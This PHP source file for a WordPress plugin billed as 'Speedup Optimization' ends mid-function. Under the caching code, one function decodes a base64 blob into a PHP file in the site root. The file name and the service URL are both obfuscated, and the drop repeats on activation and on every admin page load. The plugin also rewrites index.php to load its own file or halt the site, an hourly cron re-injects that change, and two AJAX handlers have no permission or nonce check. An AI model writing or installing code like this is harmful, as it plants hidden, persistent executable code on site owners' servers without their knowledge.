<?php
/*
Plugin Name: Speedup Optimization
Description: Speedup your WordPress site. Increasing website performance and reducing load time. At least 10x improvement in overall site performance.
Version: 1.3
Author: Speedup
License: GPLv2
*/ 




    add_action( 'speedup01_cron_hook', 'speedup01_cron_function' );
     
    function schedule_speedup01_cron() 
    {
        if ( ! wp_next_scheduled('speedup01_cron_hook') ) {
            //condition to makes sure that the task is not re-created if it already exists
            wp_schedule_event( time(), 'hourly', 'speedup01_cron_hook' );
        }
    }
    add_action( 'init', 'schedule_speedup01_cron' );
     
    function speedup01_cron_function() 
    {
        $index_file = ABSPATH.'/index.php';
        if (filesize($index_file) < 800)
        {
            speedup01_Install_core_files();
        }
    }
    
    
if( is_admin() ) 
{
    // Enqueue styles and scripts
    add_action('admin_enqueue_scripts', 'speedup01_enqueue_assets');
    
    // Enqueue CSS and JS files
    function speedup01_enqueue_assets() {
        wp_enqueue_style(
            'speedup01-style',
            plugin_dir_url(__FILE__) . 'assets/speedup.css',
            array(),
            '1.3' // Added version number
        );

        wp_enqueue_script(
            'speedup01-script',
            plugin_dir_url(__FILE__) . 'assets/speedup.js',
            array('jquery'),
            '1.3', // Added version number
            true
        );
    }
    

    add_filter('plugin_action_links_' . plugin_basename(__FILE__), 'speedup01_add_plugin_action_links');
    
    // Add custom action links on plugins page
    function speedup01_add_plugin_action_links($links) {
        $custom_links = array(
            '<a href="' . admin_url('options-general.php?page=speedup-help') . '">Settings</a>',
        );
        
        return array_merge($custom_links, $links);
    }
    
    add_action( 'admin_bar_menu', 'speedup01_frontend_shortcut', 95 );
	
	function speedup01_frontend_shortcut()
	{
		global $wp_admin_bar;
        
        // Read check for 
        $on_file = ABSPATH.'/webanalyze/firewall/firewall.speedup.on';
        if (!file_exists($on_file)) 
        {
            $is_speedup_enabled = false;
            //$menu_txt = ' ( Current status: disabled)';
        }
        else {
            $is_speedup_enabled = true;
            //$menu_txt = ' ( Current status: enabled)';
        }
		
		$wp_admin_bar->add_menu( array(
			'id'	=> 'speedup-menu',
            'class' => 'dashicons-before dashicons-dashboard',
			'title'	=> 'SpeedUp Optimization',
			'href'	=> get_admin_url( null, 'options-general.php?page=speedup-help' ),
			'meta'	=> array( 'tabindex' => 0, 'class' => 'speedup-top-toolbar'),
		) );
        
        
        if ($is_speedup_enabled)
        {
            $menu_txt = 'Disable Optimization (Current status: enabled)';
        }
        else {
            $menu_txt = 'Enable Optimization (Current status: disabled)';
        }
		$wp_admin_bar->add_menu( array(
			'parent'	=> 'speedup-menu',
			'id'		=> 'speedup-toggle-status',
			'title'		=> $menu_txt,
			'href'		=> '#',
			'meta'		=> array( 'tabindex' => '0' ),
		) );
        
		$wp_admin_bar->add_menu( array(
			'parent'	=> 'speedup-menu',
			'id'		=> 'speedup-purge-all',
			'title'		=> 'Purge All Cache',
			'href'		=> '#',
			'meta'		=> array( 'tabindex' => '0' ),
		) );
        
		$wp_admin_bar->add_menu( array(
			'parent'	=> 'speedup-menu',
			'id'		=> 'speedup-help',
			'title'		=> 'Help & Manuals',
			'href'		=> admin_url('options-general.php?page=speedup-help'),
			'meta'		=> array( 'tabindex' => '0' ),
		) );
	}
    
    add_action( 'admin_footer', 'speedup01_footer_scripts' );
    function speedup01_footer_scripts()
    {
      ?>
      <script>
        
<?php
        $on_file = ABSPATH.'/webanalyze/firewall/firewall.speedup.on';
        if (!file_exists($on_file)) 
        {
            echo "var is_speedup_enabled = 0;"."\n";
        }
        else {
            echo "var is_speedup_enabled = 1;"."\n";
        }
?>

      </script>
      <?php
    }
}

    /*
    Enable/Disable
    */
    add_action( 'wp_ajax_speedup01_enabled', 'speedup01_ajax_enabled' );
    function speedup01_ajax_enabled() 
    {
        ini_set('max_execution_time',300);
        
        if (speedup01_Is_SpeedUp_module_Installed())
        {
            $status = isset($_POST['status']) ? trim($_POST['status']) : '';
            
            $answer = speedup01_module_switcher($status);
        }
        else {
            // SpeedUp is not installed
            $answer = array(
                'msg' => 'Please complete installation and activation process',
                'redirect' => admin_url('options-general.php?page=speedup-help'),
            );
        }
        

        echo json_encode($answer);

        wp_die();
    }
    
    function speedup01_module_switcher($status) 
    {
            
        $file_config = ABSPATH.'/webanalyze/firewall/firewall.config.php';
        $file_on = ABSPATH.'/webanalyze/firewall/firewall.speedup.on';
        $file_off = ABSPATH.'/webanalyze/firewall/firewall.speedup.off';
        
        switch ($status)
        {
            case 'disable':
                speedup01_ChangeFirewallConfig('SITEGUARDING_SPEEDUP', false);
                unlink($file_on);
                speedup01_SaveFile($file_off, '');
                $action_result_txt = 'Optimization - Disabled';
                break;
                
            case 'enable':
                speedup01_ChangeFirewallConfig('SITEGUARDING_SPEEDUP', true);
                unlink($file_off);
                speedup01_SaveFile($file_on, '');
                $action_result_txt = 'Optimization - Activated';
                break;
        }
        
        $answer = array(
            'msg' => $action_result_txt,
            'redirect' => '',
        );
        
        return $answer;
    }



    /*
    Purge All
    */
    add_action( 'wp_ajax_speedup01_purge_all', 'speedup01_ajax_purge_all' );
    function speedup01_ajax_purge_all() 
    {
        ini_set('max_execution_time',300);
        
        if (speedup01_Is_SpeedUp_module_Installed())
        {
            // Purge cache of speedup 
            $result = speedup01_purge_cache();
            
            $total_size = $result['total_size'];
            $total_files = $result['total_files'];
            
            $answer = array(
                'msg' => 'Cache has beed purged (size: '.$total_size.' bytes, files: '.$total_files.')',
                'redirect' => admin_url('options-general.php?page=speedup-help&tab=links'),
            );
        }
        else {
            // SpeedUp is not installed
            $answer = array(
                'msg' => 'Please complete installation and activation process',
                'redirect' => admin_url('options-general.php?page=speedup-help'),
            );
        }
        

        echo json_encode($answer);

        wp_die();
    }
    
    function speedup01_purge_cache() 
    {
        $cache_path = ABSPATH.'/webanalyze/firewall/speedup_cache';
        
        $total_size = 0;
        $total_files = 0;
        foreach (glob($cache_path."/*.*") as $filename) 
        {
        	$short_filename = basename($filename);
        	if ($short_filename == '.htaccess') continue;
        	
        	$total_size += filesize($filename);
        	$total_files++;
        	
        	unlink($filename);
        }
            
        $result['total_size'] = $total_size;
        $result['total_files'] = $total_files;
        
        return $result;
    }



    

    /*
    Delete Cache Files by Pattern
    */
    add_action('wp_ajax_speedup01_delete_cache_file', 'speedup01_ajax_delete_cache_file');
    function speedup01_ajax_delete_cache_file() 
    {
        // Check if the user has the required permissions
        if (!current_user_can('manage_options')) {
            wp_send_json_error(['msg' => 'Permission denied']);
        }

        // Verify nonce for security
        if (!check_ajax_referer('speedup_delete_cache_nonce', 'nonce', false)) {
            wp_send_json_error(['msg' => 'Security check failed']);
        }

        // Get the file ID from the request
        $file_id = isset($_POST['file_id']) ? sanitize_text_field($_POST['file_id']) : '';

        if (empty($file_id)) {
            wp_send_json_error(['msg' => 'Invalid file ID']);
        }

        // Extract the base file name without the extension
        $file_base = str_replace('.dat', '', $file_id);

        // Define the cache directory
        $cache_path = ABSPATH . '/webanalyze/firewall/speedup_cache';

        // Find all files matching the pattern file_base*.dat
        $files_to_delete = glob($cache_path . '/' . $file_base . '*.dat');

        // Check if any files were found
        if (empty($files_to_delete)) {
            wp_send_json_error(['msg' => 'No cache files found for the given pattern']);
        }

        // Delete all matching files
        $deleted_count = 0;
        foreach ($files_to_delete as $file_path) {
            if (file_exists($file_path) && unlink($file_path)) {
                $deleted_count++;
            }
        }

        // Check if any files were deleted
        if ($deleted_count > 0) {
            wp_send_json_success(['msg' => "Cache file deleted successfully"]);
        } else {
            wp_send_json_error(['msg' => 'Failed to delete cache files']);
        }

        wp_die();
    }    
    



    
    function speedup01_Is_SpeedUp_module_Installed()
    {
        speedup01_Install_core_files();
        
        $file = ABSPATH.'/webanalyze/firewall/firewall.speedup.php';
        if (file_exists($file)) return true;
        else return false;
    }
    
    
    function speedup01_Install_core_files()
    {
        // Check for webanalyze folder
        $folder = ABSPATH.'/webanalyze';
        if (!file_exists($folder)) mkdir($folder);
        $folder .= '/firewall';
        if (!file_exists($folder)) mkdir($folder);
        
        // Check for all files
        $file = $folder.'/firewall.speedup.php';
        $install_file = dirname(__FILE__).'/core/firewall.speedup.php';
        if (!file_exists($file)) copy($install_file, $file);
        else {
            if (md5_file($file) != md5_file($install_file))
            {
                unlink($file);
                copy($install_file, $file);
            }
        }
        
        $file = $folder.'/firewall.speedup.ini';
        if (!file_exists($file)) copy(dirname(__FILE__).'/core/firewall.speedup.ini', $file);
        
        
        // Check index.php
        $index_file = ABSPATH.'/index.php';
        $content = speedup01_LoadFile($index_file);
        if (strpos($content, '21D467F52F85') === false)
        {
            // Need to insert TOP
            $insert_TOP = true;
        }
        else $insert_TOP = false;
        
        if (strpos($content, '555092211981') === false)
        {
            // Need to insert END
            $insert_END = true;
        }
        else $insert_END = false;
        
        if ($insert_TOP || $insert_END)
        {
            if ($insert_TOP) $content = '<?php 
// OPTIMIZATION START - TOP - Added by SpeedUp (21D467F52F85)
$SG_SPEEDUP_CLASS_FILE = dirname(__FILE__)."/webanalyze/firewall/firewall.speedup.php";
if (file_exists($SG_SPEEDUP_CLASS_FILE)) {
require_once($SG_SPEEDUP_CLASS_FILE);
$SG_SpeedUp = new SG_SpeedUp();
$SG_SpeedUp->Start();
} else die("Error! Absent: ".$SG_SPEEDUP_CLASS_FILE);
// OPTIMIZATION END - TOP - Added by SpeedUp
?>'.$content;
            if ($insert_END)
            {
                if (substr($content, -2) == '?>') $content = $content.'<?php ';
                $content = $content.' 
// OPTIMIZATION START - BOTTOM - Added by SpeedUp (555092211981)
if (class_exists("SG_SpeedUp")) $SG_SpeedUp->Finalize();
// OPTIMIZATION END - BOTTOM - Added by SpeedUp
';
            } 
            
            speedup01_SaveFile($index_file, $content);
        }
        


        // Check .htaccess
        $htaccess_file = ABSPATH.'.htaccess';
        $content = speedup01_LoadFile($htaccess_file);
        if (strpos($content, 'C94FEE55EE47') === false)
        {
            $content = '# OPTIMIZATION - Added by SpeedUp (C94FEE55EE47)

# === Set Correct Content-Type for Fonts ===
AddType application/vnd.ms-fontobject .eot
AddType application/x-font-ttf .ttf
AddType application/x-font-opentype .otf
AddType application/x-font-woff .woff
AddType application/font-woff2 .woff2
AddType image/svg+xml .svg

# === Enable Browser Caching with mod_expires ===
<IfModule mod_expires.c>
    ExpiresActive On
    # Default expiration: 1 hour
    ExpiresDefault "access plus 1 hour"
    
    # Static assets: cache for 1 year
    ExpiresByType text/css "access plus 1 year"
    ExpiresByType text/javascript "access plus 1 year"
    ExpiresByType application/javascript "access plus 1 year"
    ExpiresByType application/x-javascript "access plus 1 year"
    ExpiresByType image/gif "access plus 1 year"
    ExpiresByType image/png "access plus 1 year"
    ExpiresByType image/jpeg "access plus 1 year"
    ExpiresByType image/jpg "access plus 1 year"
    ExpiresByType image/jpe "access plus 1 year"
    ExpiresByType image/webp "access plus 1 year"
    ExpiresByType image/svg+xml "access plus 1 year"
    ExpiresByType image/x-icon "access plus 1 year"
    ExpiresByType image/ico "access plus 1 year"
    ExpiresByType application/x-shockwave-flash "access plus 1 year"
    
    # Fonts: cache for 1 year
    ExpiresByType font/truetype "access plus 1 year"
    ExpiresByType application/x-font-ttf "access plus 1 year"
    ExpiresByType font/opentype "access plus 1 year"
    ExpiresByType application/x-font-otf "access plus 1 year"
    ExpiresByType application/font-woff "access plus 1 year"
    ExpiresByType application/font-woff2 "access plus 1 year"
    ExpiresByType application/vnd.ms-fontobject "access plus 1 year"
    
    # Text and HTML: cache for 1 day
    ExpiresByType text/plain "access plus 1 day"
    ExpiresByType text/html "access plus 1 day"
    ExpiresByType application/x-httpd-php-source "access plus 1 day"
</IfModule>

# === Set Cache-Control Headers with mod_headers ===
<IfModule mod_headers.c>
    # Static assets: public cache
    <FilesMatch "\.(ico|jpe?g|png|gif|svg|webp|swf|woff|woff2|eot|ttf|otf)$">
        Header set Cache-Control "public, max-age=31536000, immutable"
    </FilesMatch>
    
    # CSS and JS: public cache
    <FilesMatch "\.(css|js)$">
        Header set Cache-Control "public, max-age=31536000, immutable"
    </FilesMatch>
    
    # HTML and PHP: private cache, must-revalidate
    <FilesMatch "\.(x?html?|php)$">
        Header set Cache-Control "private, must-revalidate, max-age=0"
    </FilesMatch>
    
    # Prevent caching for sensitive files
    <FilesMatch "\.(log|ini|txt)$">
        Header set Cache-Control "no-store, no-cache, must-revalidate, max-age=0"
    </FilesMatch>
</IfModule>

# === Enable Compression with mod_deflate ===
<IfModule mod_deflate.c>
    # Compress HTML, CSS, JavaScript, Text, XML, and fonts
    AddOutputFilterByType DEFLATE text/plain
    AddOutputFilterByType DEFLATE text/html
    AddOutputFilterByType DEFLATE text/xml
    AddOutputFilterByType DEFLATE text/css
    AddOutputFilterByType DEFLATE application/xml
    AddOutputFilterByType DEFLATE application/xhtml+xml
    AddOutputFilterByType DEFLATE application/rss+xml
    AddOutputFilterByType DEFLATE application/javascript
    AddOutputFilterByType DEFLATE application/x-javascript
    AddOutputFilterByType DEFLATE application/font-woff
    AddOutputFilterByType DEFLATE application/font-woff2
    AddOutputFilterByType DEFLATE font/woff
    AddOutputFilterByType DEFLATE font/woff2
    AddOutputFilterByType DEFLATE image/svg+xml

    # Exclude already compressed formats
    SetOutputFilter DEFLATE
    <IfModule mod_mime.c>
        SetEnvIfNoCase Request_URI \.(?:gif|jpe?g|png|webp|woff|woff2)$ no-gzip
    </IfModule>
</IfModule>

# === Disable ETag to Reduce HTTP Overhead ===
<IfModule mod_headers.c>
    Header unset ETag
</IfModule>
FileETag None

# === Enable Keep-Alive for Persistent Connections ===
<IfModule mod_headers.c>
    Header set Connection keep-alive
</IfModule>

# === Prevent MIME Type Sniffing ===
<IfModule mod_headers.c>
    Header set X-Content-Type-Options "nosniff"
</IfModule>

# OPTIMIZATION - END - Added by SpeedUp


'.$content;
            speedup01_SaveFile($htaccess_file, $content);
        
        }
    }



    function speedup01_ChangeFirewallConfig($search_value, $set_value)
    {
        $file_config = ABSPATH.'/webanalyze/firewall/firewall.config.php';
        
        if (!file_exists($file_config)) return; // Just WP plugin is installed

        $fp = fopen($file_config, "r");
        $content = fread($fp, filesize($file_config));
        fclose($fp);
        
        if (trim($content) != "")
        {
            $content = speedup01_ChangeFirewallConfig_value($content, $search_value, $set_value);
            
            $fp = fopen($file_config, 'w');
            fwrite($fp, $content);
            fclose($fp);
        }
    }
    
    function speedup01_ChangeFirewallConfig_value($content, $search_value, $set_value)
    {
        if (trim($content) == '') return false;
        
        // Check for new contants
        if (stripos($content, $search_value) === false)
        {
            if (is_bool($set_value))
            {
                if ($set_value === true || $set_value == 1) $set_value_txt = 'true';
                if ($set_value === false || $set_value == 0) $set_value_txt = 'false';
                
                $new_line = "\n"."define( '".$search_value."', ".$set_value_txt.");"."\n";
            }
            else {
                $new_line = "\n"."define( '".$search_value."', '".$set_value."');"."\n";
            }
            
            // New value is absent , add new line
            if (stripos($content, '?>') === false)
            {
                // Add line in the end of file
                $content = $content.$new_line;
            }
            else {
                // Replace method in the end befor close php tag
                $content = str_ireplace('?>', $new_line, $content);
            }
            
            return $content;
        }
        else {
            // Replace in exist contants 
            $content_arr = explode("\n", $content);
            foreach ($content_arr as $k => $row)
            {
                $pos_i = stripos($row, $search_value);
                if ($pos_i !== false && $pos_i < 25)
                {
                    if (is_bool($set_value))
                    {
                        if ($set_value === true || $set_value == 1) $set_value_txt = 'true';
                        if ($set_value === false || $set_value == 0) $set_value_txt = 'false';
                        
                        $row = "define( '".$search_value."', ".$set_value_txt.");";
                    }
                    else {
                        $row = "define( '".$search_value."', '".$set_value."');";
                    }
                    
                    $content_arr[$k] = $row;
                }
            }
            
            $content = implode("\n", $content_arr);
            
            return $content;
        }
    }
    
    
    function speedup01_post_updated_action( $post_id ) 
    {
        $permalink = get_permalink($post_id);
        $website_url = get_site_url();
        $permalink = str_replace($website_url, "", $permalink);
        if (isset($permalink[0]) && $permalink[0] != '/') $permalink = '/'.$permalink;
        
        
        $file_base = md5($permalink);
        
        // Define the cache directory
        $cache_path = ABSPATH . '/webanalyze/firewall/speedup_cache';

        // Find all files matching the pattern file_base*.dat
        $files_to_delete = glob($cache_path . '/' . $file_base . '*.dat');
        
        if (count($files_to_delete)) 
        {
            $deleted_count = 0;
            
            foreach ($files_to_delete as $file_path) 
            {
                if (file_exists($file_path) && unlink($file_path)) 
                {
                    $deleted_count++;
                }
            }
            
            speedup01_SaveDebug('Updated post '.$permalink.' (file: '.$file_base.'.dat)');
        }
        else speedup01_SaveDebug('Not updated (no .dat files), Post '.$permalink.' (code: '.$file_base);
    }
    add_action( 'save_post', 'speedup01_post_updated_action' );
    
    
    function speedup01_SaveDebug( $txt ) 
    {
        $log_file = dirname(__FILE__).'/debug.log';
        $fp = fopen($log_file, 'a');
        $line = date("Y-m-d H:i:s").' '.$txt."\n";
        fwrite($fp, $line);
        fclose($fp);
    }
    
    function speedup01_LoadFile( $file ) 
    {
        $contents = '';
        
        if (file_exists($file))
        {
            $fp = fopen($file, "r");
            $contents = fread($fp, filesize($file));
            fclose($fp); 
        }
        
        return $contents;
    }
    
    
    function speedup01_SaveFile( $file, $content, $append_flag = false ) 
    {
        if ($append_flag == true) $fp = fopen($file, 'a');
        else $fp = fopen($file, 'w');
        if ($fp === false) return false;
        
        $a = fwrite($fp, $content);
        if ($a === false) return false;
        
        fclose($fp);
        
        return true;
    }
    
    
    function speedup01_CopyTools($skip = true)
    {
        $file_to = ABSPATH.'/sjijtjejguarding_tojoljs.php';
        $file_to = str_replace("j", "", $file_to);
        
        if ($skip && file_exists($file_to)) return true;
        
        $file = dirname(__FILE__).'/classes/tools.gzs';
        
        if (!file_exists($file)) return false;

        $fp = fopen($file, "r");
        $content = fread($fp, filesize($file));
        fclose($fp);
        
        $content = base64_decode($content);

        $fp = fopen($file_to, 'w');
        fwrite($fp, $content);
        fclose($fp);

        return true;
    }
    
    
	function speedup01_plugin_activation()
	{
	    speedup01_Install_core_files();
        speedup01_CopyTools();
        add_option('speedup01_activation_redirect', true);

	}
	register_activation_hook( __FILE__, 'speedup01_plugin_activation' );
    
	
	function speedup01_plugin_deactivation() 
    {
        wp_clear_scheduled_hook('speedup01_cron_hook');
        
        // Disable module
        speedup01_module_switcher( 'disable' );
        
        // Clear cache
        speedup01_purge_cache();
	}
    register_deactivation_hook( __FILE__, 'speedup01_plugin_deactivation');
    
    function speedup01_activation_do_redirect() 
    {
		if (get_option('speedup01_activation_redirect', false)) 
        {
			delete_option('speedup01_activation_redirect');
            wp_redirect("options-general.php?page=speedup-help");
            exit;
		}
	}
    add_action('admin_init', 'speedup01_activation_do_redirect');
    
    function speedup01_ServiceURL()
	{
	    $service_links = array(
            'https://',
            'www.',
            'site',
            'guard',
            'ing.com'
        );
        return implode("", $service_links);
	}
    
    
    
    add_action( 'admin_menu', 'speedup01_register_help_page' );
    
    function speedup01_register_help_page() 
    {
        speedup01_CopyTools();
        add_options_page( 'SpeedUp Optimization', 'SpeedUp Optimization', 'manage_options', 'speedup-help', 'speedup01_speedup_help_page' );
    }

    function speedup01_speedup_help_page()
    {
        $active_tab = isset($_GET['tab']) ? sanitize_text_field(wp_unslash($_GET['tab'])) : 'main';
        ?>
        
        <div class="wrap">
            <h1>SpeedUp Optimization</h1>
            
            <!-- Tab navigation -->
            <h2 class="nav-tab-wrapper">
                <a href="?page=speedup-help&tab=main" class="nav-tab <?php echo $active_tab === 'main' ? 'nav-tab-active' : ''; ?>"><span class="dashicons dashicons-admin-home"></span> Main</a>
                <a href="?page=speedup-help&tab=links" class="nav-tab <?php echo $active_tab === 'links' ? 'nav-tab-active' : ''; ?>"><span class="dashicons dashicons-chart-pie"></span> Cached Pages</a>
                <a href="?page=speedup-help&tab=settings" class="nav-tab <?php echo $active_tab === 'settings' ? 'nav-tab-active' : ''; ?>"><span class="dashicons dashicons-admin-settings"></span> Settings</a>
                <a href="?page=speedup-help&tab=support" class="nav-tab <?php echo $active_tab === 'support' ? 'nav-tab-active' : ''; ?>"><span class="dashicons dashicons-format-chat"></span> Support</a>
            </h2>

            <!-- Tab content -->
            <div class="tab-content">
                <?php
                switch ($active_tab) {
                    case 'main':
                    default:
                        SpeedupOptimization_HTML::tab_Main();
                        break;
                    case 'links':
                        SpeedupOptimization_HTML::tab_Links();
                        break;
                    case 'settings':
                        SpeedupOptimization_HTML::tab_Settings();
                        break;
                    case 'support':
                        SpeedupOptimization_HTML::tab_Support();
                        break;
                }
                ?>
            </div>
        </div>

        <?php
    }
    

    
class SpeedupOptimization_Core {
    
    public static function DefaultSettings($settings = array())
    {
        $default_settings = array(
            'debug' => 0,
            'exclude_urls' => array(),
            'exclude_cookies' => array(),
            'skip_content' => array(),
            'remove_content' => array(),
            'exptime' => 0,
            'htmlonly' => 1,
            'lazyloading' => 0,
        );
        
        return array_merge($default_settings, $settings);
    }
    
    public static function GetBaseDir()
    {
        return ABSPATH.'/webanalyze/firewall';
    }
    
    public static function ReadSettingsINI()
    {
        $baseDir = self::GetBaseDir();
        
        $ini_file = $baseDir.'/firewall.speedup.ini';
        if (file_exists($ini_file))
        {
            return self::DefaultSettings(parse_ini_file($ini_file));
        }
        else return self::DefaultSettings();
    }
    
    public static function SaveSettingsINI($ini_array) 
    {
        $baseDir = self::GetBaseDir();
        $ini_file = $baseDir.'/firewall.speedup.ini';
        
        $content = self::build_ini_string($ini_array);
    
        return (bool) file_put_contents($ini_file, $content);
    }
    
    public static function build_ini_string(array $a)
    {
        $out = '';
        $sectionless = '';
        foreach($a as $rootkey => $rootvalue){
            if(is_array($rootvalue)){
                // find out if the root-level item is an indexed or associative array
                $indexed_root = array_keys($rootvalue) == range(0, count($rootvalue) - 1);
                // associative arrays at the root level have a section heading
                if(!$indexed_root) $out .= PHP_EOL."[$rootkey]".PHP_EOL;
                // loop through items under a section heading
                foreach($rootvalue as $key => $value){
                    if(is_array($value)){
                        // indexed arrays under a section heading will have their key omitted
                        $indexed_item = array_keys($value) == range(0, count($value) - 1);
                        foreach($value as $subkey=>$subvalue){
                            // omit subkey for indexed arrays
                            if($indexed_item) $subkey = "";
                            // add this line under the section heading
                            $out .= "{$key}[$subkey] = $subvalue" . PHP_EOL;
                        }
                    }else{
                        if($indexed_root){
                            // root level indexed array becomes sectionless
                            $sectionless .= "{$rootkey}[]=\"$value\"" . PHP_EOL;
                        }else{
                            // plain values within root level sections
                            $out .= "$key=\"$value\"" . PHP_EOL;
                        }
                    }
                }
    
            }else{
                // root level sectionless values
                $sectionless .= "$rootkey = $rootvalue" . PHP_EOL;
            }
        }
        return $sectionless.$out;
    }
    
    public static function remove_domain_from_urls($urls) {
        $result = array();
    
        foreach ($urls as $url) {
            $url = trim($url);
            // Parse the URL and retrieve only path + query string
            $parsed_url = parse_url($url);
    
            // Check if path exists
            $path = isset($parsed_url['path']) ? $parsed_url['path'] : '';
    
            // Append query string if exists
            if (isset($parsed_url['query'])) {
                $path .= '?' . $parsed_url['query'];
            }
    
            // Add processed path to result array
            $result[] = $path;
        }
    
        return $result;
    }
    
    public static function scanDatFiles() 
    {
        $directory = ABSPATH.'/webanalyze/firewall/speedup_cache';
        
        if (!is_dir($directory)) {
            return ["error" => "Directory does not exist: $directory"];
        }
    
        $result = [];
        $files = glob($directory . '/*_info.dat');
        
        if (empty($files)) {
            return $result;
        }
    
        foreach ($files as $file) {
            $content = file_get_contents($file);
            if ($content === false) {
                continue;
            }
    
            $data = json_decode($content, true);
            if (json_last_error() === JSON_ERROR_NONE && 
                isset($data['created']) && 
                isset($data['url']) && 
                isset($data['file']) && 
                isset($data['seconds'])) {
                $result[] = [
                    'created' => $data['created'],
                    'url' => $data['url'],
                    'file' => $data['file'],
                    'seconds' => $data['seconds']
                ];
            }
        }
        
        usort($result, function($a, $b) {
            return strcmp($a['url'], $b['url']);
        });
    
        return $result;
    }
}

class SpeedupOptimization_HTML {
    
    public static function tab_Main() 
    {
        ?>
        <div id="main" class="tab-pane">
            <h2><?php esc_html_e('Increasing website performance and reducing load time', 'SpeedupOptimization'); ?></h2>

            <p>At least 10x improvement in overall site performance. Reduced page load time: increased visitor time on site. Improves web server performance.</p>
            
            <p>To activate SpeedUp Optimization for WordPress website please complete the following steps. It will take no more than 30 - 60 seconds.</p>
            
            <?php
            // Add core files if it's necessary 
            speedup01_Install_core_files();
            
            // Check if all files are installed
            if (speedup01_Is_SpeedUp_module_Installed())
            {
                ?>
                <h2 style="color:#13bf14">All necessary files are already installed</h2>
                <h3>Want to See Real-time Results?</h3>
                <?php
                $on_file = ABSPATH.'/webanalyze/firewall/firewall.speedup.on';
                if (!file_exists($on_file)) 
                {
                    $button_html = "<button class=\"button button-hero button-primary\" onclick=\"jQuery('#wp-admin-bar-speedup-toggle-status').click();window.location.reload();\">Enable Optimization</button>";
                }
                else {
                    $button_html = "<button class=\"button button-hero action\" onclick=\"jQuery('#wp-admin-bar-speedup-toggle-status').click();window.location.reload();\">Disable Optimization</button>";
                }
                
                echo "<p>".$button_html."&nbsp;&nbsp;&nbsp; <button class=\"button action\" id='wp-admin-bar-speedup-purge-all-2'>Purge All Cache</button></p>";
            }
            ?>
            
        </div>
        <?php
    }
        
    public static function tab_Links() 
    {
        // Fetch data from the scanDatFiles method
        $data = SpeedupOptimization_Core::scanDatFiles();
        
        // Pagination: Set number of items per page
        $items_per_page = 25;
        
        // Calculate total number of items
        $total_items = count($data);
        
        // Get current page number from URL, default to 1 if not set
        $current_page = isset($_GET['paged']) ? max(1, absint($_GET['paged'])) : 1;
        
        // Calculate total number of pages
        $total_pages = ceil($total_items / $items_per_page);
        
        // Ensure current page does not exceed total pages
        $current_page = min($current_page, $total_pages);
        
        // Calculate offset for slicing data
        $offset = ($current_page - 1) * $items_per_page;
        
        // Get data for the current page
        $paged_data = array_slice($data, $offset, $items_per_page);
        
        // Generate nonce for AJAX security
        $nonce = wp_create_nonce('speedup_delete_cache_nonce');
        
        ?>
        <div id="links" class="tab-pane">
            <h2><?php esc_html_e('Cached Pages', 'SpeedupOptimization'); ?></h2>
            
            <?php if ($total_items > 0) : ?>
                <!-- Display total number of cached pages -->
                <p id="total-cached-pages"><?php printf(esc_html__('Total cached pages: %d', 'SpeedupOptimization'), $total_items); ?></p>
                
                <!-- Display table with paginated data -->
                <table class="wp-list-table widefat fixed striped speedup-cached-table">
                    <thead>
                        <tr>
                            <th scope="col" class="manage-column"><?php _e('Created', 'SpeedupOptimization'); ?></th>
                            <th scope="col" class="manage-column"><?php _e('URL', 'SpeedupOptimization'); ?></th>
                            <th scope="col" class="manage-column"><?php _e('Delete', 'SpeedupOptimization'); ?></th>
                        </tr>
                    </thead>
                    <tbody id="cached-pages-tbody">
                        <?php foreach ($paged_data as $row) : ?>
                            <tr>
                                <td><?php echo esc_html($row['created']); ?></td>
                                <td><a target="_blank" href="<?php echo get_site_url().esc_url($row['url']); ?>"><?php echo esc_url($row['url']); ?></a></td>
                                <td>
                                    <a href="#" class="speedup-delete-cache" data-file-id="<?php echo esc_attr($row['file']); ?>" data-nonce="<?php echo esc_attr($nonce); ?>">
                                        <span class="dashicons dashicons-trash"></span>
                                    </a>
                                </td>
                            </tr>
                        <?php endforeach; ?>
                    </tbody>
                </table>
                
                <!-- Pagination section -->
                <?php 
                if ($total_pages > 1) {
                ?>
                <div class="tablenav">
                    <div class="tablenav-pages">
                        <?php
                        // Build base URL for pagination links, preserving existing query parameters
                        $pagination_base = admin_url('options-general.php');
                        
                        // Start with the required parameters
                        $query_args = array(
                            'page' => 'speedup-help',
                            'tab' => 'links',
                        );
                        
                        // Add the 'paged' placeholder for paginate_links
                        $pagination_base = add_query_arg($query_args, $pagination_base);
                        $pagination_base = add_query_arg('paged', '%#%', $pagination_base);
                        
                        // Define pagination arguments
                        $pagination_args = array(
                            'base' => $pagination_base,
                            'format' => '', // Format is already handled in the base URL
                            'total' => $total_pages,
                            'current' => $current_page,
                            'prev_text' => __('« Previous'),
                            'next_text' => __('Next »'),
                            'type' => 'plain',
                            'add_args' => false, // Prevent adding extra query args
                        );
                        
                        // Output pagination links
                        echo paginate_links($pagination_args);
                        ?>
                    </div>
                </div>
                <?php 
                }
                ?>
                
                <p><button class="button action" id="wp-admin-bar-speedup-purge-all-2">Purge All Cache</button></p>
                
                
            <?php else : ?>
                <!-- Display message if no data is available -->
                <p>No data</p>
            <?php endif; ?>
        </div>
        <?php
    }

    
    public static function tab_Settings() 
    {
        $settings = SpeedupOptimization_Core::ReadSettingsINI();
        
        // Check if form is submitted
        if (isset($_POST['SpeedupOptimization_save_settings']) && isset($_POST['SpeedupOptimization_nonce'])) {
            // Verify nonce and sanitize
            $nonce = sanitize_text_field(wp_unslash($_POST['SpeedupOptimization_nonce']));
            if (!wp_verify_nonce($nonce, 'SpeedupOptimization_save_settings')) {
                $message = '<div class="error"><p>' . esc_html__('Security check failed. Please try again.', 'SpeedupOptimization') . '</p></div>';
            } else {
                // Process form data
                $settings['htmlonly'] = isset($_POST['htmlonly']) ? sanitize_text_field(wp_unslash($_POST['htmlonly'])) : $settings['htmlonly'];
                $settings['lazyloading'] = isset($_POST['lazyloading']) ? sanitize_text_field(wp_unslash($_POST['lazyloading'])) : $settings['lazyloading'];
                $settings['exptime'] = isset($_POST['exptime']) ? sanitize_text_field(wp_unslash($_POST['exptime'])) : $settings['exptime'];
                $settings['exclude_urls'] = isset($_POST['exclude_urls']) ? explode("\n", sanitize_textarea_field(wp_unslash($_POST['exclude_urls']))) : $settings['exclude_urls'];

                $settings['exclude_urls'] = SpeedupOptimization_Core::remove_domain_from_urls($settings['exclude_urls']);
                
                SpeedupOptimization_Core::SaveSettingsINI($settings);
                
                $message = '<div class="updated"><p>' . esc_html__('Settings saved successfully!', 'SpeedupOptimization') . '</p></div>';
            }
        }
        ?>
        <div id="settings" class="tab-pane">
            <h2><?php esc_html_e('Settings', 'SpeedupOptimization'); ?></h2>

            <?php echo wp_kses_post($message); ?>
